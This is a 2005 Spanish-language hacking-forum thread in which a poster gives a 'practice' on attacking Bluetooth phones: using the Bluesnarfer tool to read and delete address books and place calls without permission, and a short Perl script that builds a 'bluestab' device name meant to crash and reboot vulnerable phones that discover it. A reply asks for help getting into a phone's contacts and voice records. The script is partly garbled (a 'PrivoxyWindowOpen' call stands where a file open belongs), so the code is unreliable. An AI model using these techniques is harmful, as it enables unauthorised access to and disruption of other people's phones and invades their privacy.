elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


+  Foro de elhacker.net
|-+  Comunicaciones
| |-+  Dispositivos Móviles (PDA's, Smartphones, Tablets)
| | |-+  Hacking Mobile
| | | |-+  Práctica 1 - Acceder a agendas, borrarlas, hacer llamadas sin permiso, etc...
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Práctica 1 - Acceder a agendas, borrarlas, hacer llamadas sin permiso, etc...  (Leído 9,241 veces)
- xXx -


Desconectado Desconectado

Mensajes: 495


[::wormz::]


Ver Perfil WWW
Práctica 1 - Acceder a agendas, borrarlas, hacer llamadas sin permiso, etc...
« en: 12 Julio 2005, 12:15 pm »

Bueno voy a hacer mi aportación personal al taller, como ya puse otras noticias y descargas ahora voy a seguir con otra práctica, rápida y simple.


PRIMERA PARTE

Lo que vamos a ver es cómo acceder a un teléfono movil con BT ( no todos los móviles son vulnerables). Como habréis leido en varias noticias, por ejemplo en la recopilación que hizo firos:

http://foro.elhacker.net/index.php/topic,77595.0.html

Se habla de bluesniffer, que con un portatil accediendo a un parlamento o senado no recuerdo bien, se hicieron con la agenda electrónica de muchos de los políticos, pues ahora os voy a mostrar cómo se hizo este ejercicio, bastante simple a pesar de parecer muy complicado.

Para ello necesitaremos un programa del mismo nombre blusnafer que podeis descargar aquí:

http://usuarios.lycos.es/wormzweb/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=277&title=Bluesnarfer%200.1

Este pequeña utilidad permite por medio de comandos acceder a ciertos teléfonos móviles vulnerables, y conseguir ver un listado de las últimas llamadas, ver la agenda electronica, borrarla, hacer llamadas , etc... todo esto lo podéis ver en el siguiente video explicativo bastatne corto y muy demostrativo de lo simple que resulta hacer todo esto:

http://usuarios.lycos.es/wormzweb/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=280&title=Video%20tutorial%20de%20blue%20snarfer

Podéis leer mas información sobre esto en el siguiente link:
http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=218


SEGUNDA PARTE

En esta segunda parte voy a mostrar algo bien simple, es una vulnerabilidad conocida como bluestab, (puñalada azul) la cual permite el reinicio de ciertos dispositivos vulnerables, para lo cual basta con cambiar el nick de tu dispositivo movil, esto es debido a usar una parte de código hexadecimal en el nick que provoca que ciertos teléfonos se bloquen y es reinicien automaticamente, esta vulnerabilidad es muy curiosa ya que simplemente con tener este nick, cuando alguien busque dispositivos BT y encuentre el tuyo, se reiniciará automaticamente sin saber el motivo. Para realizar esto basta con usar el siguiente programa que os creará un nick "xploit", que debereis copiar luego como nick.


Código:
nokia-bt-cx.pl

-------------start---------------

#!/usr/bin/perl -w



my $btnick;

my $bth;

my $bts;

my $file;

$bth = " .";

print "\n********************** ************************************************** **************************** ************\n

";

print "****************** Reinicio de dispositivos vulnerables por medio de nombre en dispositivo BT ********************\n";

print "** mas información sobre su uso en http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=217 **\n";

print "*****************                                [::wormz::] www.wormzweb.tk                      *****************\n";

print "************************* ****************************** ****************************** ******************************\n";



print " \n Escribe tu nick : ";

$btnick = <STDIN>;

chomp($btnick);

print " \n OUTPUT : ";

$file = <STDIN>;

chomp($file);

PrivoxyWindowOpen(BLUEN, ">>$file") || die "No se ha podido crear el archivo $!\n";

$bts = "$btnick$bth";

print BLUEN ("$bts");

close(BLUEN);



print "\n ¡Finalizado! , Envia el texto a tu teléfono y copialo en el nombre de tu telefono BT \n\n";

-------------end-----------------

Bueno como he dicho este programilla os creará un fichero que debeis enviar a vuestro movil y copiarlo en el nick.

Podéis leer mas información sobre esto en el siguiente link:
http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=218


TERCERA PARTE:

Bueno, siento no ser mas comleto en todo esto pero estoy aún bastante liado, espero que en unos dias tener mas tiempo y poder ser mas específico y explicar todo mas en profundidad para los que le gusta la teoría, también para los que les gusta juguetear con pequeñas aplicaciones les recomiendo que vean la noticia que puse en mi web sobre hack BT, en la que hay unas pequeñas aplicaciones para descargar muy simples, que por lo general son escaneadores con diferentes utilidades y bastante interesantes.

http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=218

Espero haber servido de ayuda en el taller y que sea una aportación mas al taller BT.

Un saludo xXx


« Última modificación: 12 Julio 2005, 12:25 pm por - xXx - » En línea

Gospel
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.587


Ver Perfil WWW
Re: Práctica 1 - Acceder a agendas, borrarlas, hacer llamadas sin permiso, etc...
« Respuesta #1 en: 12 Julio 2005, 19:11 pm »

Oye, muchísimas gracias por la aportación! Pero podrías subir la información a otro repositorio en el q no haga falta estar registrado para descargarse los contenidos?? Lo digo pq al intentar acceder a los links de wormzweb te dice "acceso denegado", y es necesario estar registrado...

Gracias de nuevo.

Salu2


En línea

arranxam

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: Práctica 1 - Acceder a agendas, borrarlas, hacer llamadas sin permiso, etc...
« Respuesta #2 en: 4 Septiembre 2005, 13:12 pm »

necesito tener acceso  a los archivos de un telefono movil, pero no tengo suficientes conocimientos para ello, me podria explicar por donde empezar . necesitaria ver la agenda de voz y la agenda de direcciones de internet, gracias anticipadas
En línea

Firos
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.410


Enseña lo que sepas... y oculta lo peor...


Ver Perfil
Re: Práctica 1 - Acceder a agendas, borrarlas, hacer llamadas sin permiso, etc...
« Respuesta #3 en: 5 Septiembre 2005, 13:02 pm »

Pues creo que esas cosas en concreto estan en proceso todavia. De todas formas toda la información esta en las prácticas que tienen chincheta (o en la web).

Simplemente tienes que leertelos... ahí esta todo lo que te hace falta. No se si se podría hacer a través de los comandos AT (que ya se explican en una de las chinchetas).

Puedes leertelos y si tienes alguna duda pregunta más concretamente ya que esto seria hacer un tutorial. Que ya habrá tiempo para hacerlos ;)


Un saludo.
« Última modificación: 5 Septiembre 2005, 18:36 pm por Firos » En línea

El final del camino no está determinado, lo determinamos nosotros mismos paso a paso, día a día, y se puede cambiar.
Kasswed
Colaborador
***
Desconectado Desconectado

Mensajes: 5.295

Rolling Stones


Ver Perfil
Re: Práctica 1 - Acceder a agendas, borrarlas, hacer llamadas sin permiso, etc..
« Respuesta #4 en: 5 Septiembre 2005, 15:43 pm »

Ta complicao esto del BlueTooh... lei el primer capitulo y por poco si me desmayo... yo creo k es mas bien para gente experta...

Saludos!
En línea

"He who allows himself to be insulted, deserves to be."

Repórtame cualquier falta a las normas del foro por mensaje privado.
Jec


Desconectado Desconectado

Mensajes: 1.150


Not-Public


Ver Perfil WWW
Re: Práctica 1 - Acceder a agendas, borrarlas, hacer llamadas sin permiso, etc..
« Respuesta #5 en: 5 Septiembre 2005, 21:35 pm »

Ta complicao esto del BlueTooh... lei el primer capitulo y por poco si me desmayo... yo creo k es mas bien para gente experta...

Saludos!
pues te equivocas, desde hace un par de dias me estado dia y niche investigando todo lo del bluetooth porque estoy redactando un articulo, antecedentes, seguridad, etc, etc...
y es cuestion de meterle ganas, no soy ningun experto y he avanzado bastante en el tema
un saludo
En línea

Conthackto.com.mx
Jec


Desconectado Desconectado

Mensajes: 1.150


Not-Public


Ver Perfil WWW
Re: Práctica 1 - Acceder a agendas, borrarlas, hacer llamadas sin permiso, etc..
« Respuesta #6 en: 5 Septiembre 2005, 21:37 pm »

Porcierto si alguien quiere el video se lo puede descargar de http://www.crimemachine.com/Tuts/Video/bluesnarfer.avi

un saludo
En línea

Conthackto.com.mx
Gospel
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.587


Ver Perfil WWW
Re: Práctica 1 - Acceder a agendas, borrarlas, hacer llamadas sin permiso, etc...
« Respuesta #7 en: 7 Septiembre 2005, 22:17 pm »

Oye JEC, ese video no lo conocía yo. Es del Defcon group in the 530. Me ha gustado mucho y si no te importa lo subiremos a la sección de Downloads de la página de Bluehack.

Sobre lo q estás haciendo estos días, si avanzas en algo y nos quieres contar, aquí estamos... :)

Salu2 y gracias por el video.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Como hacer llamadas encriptadas
Dispositivos Móviles (PDA's, Smartphones, Tablets)
Lukylla 3 2,457 Último mensaje 3 Marzo 2014, 03:10 am
por Shell Root
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines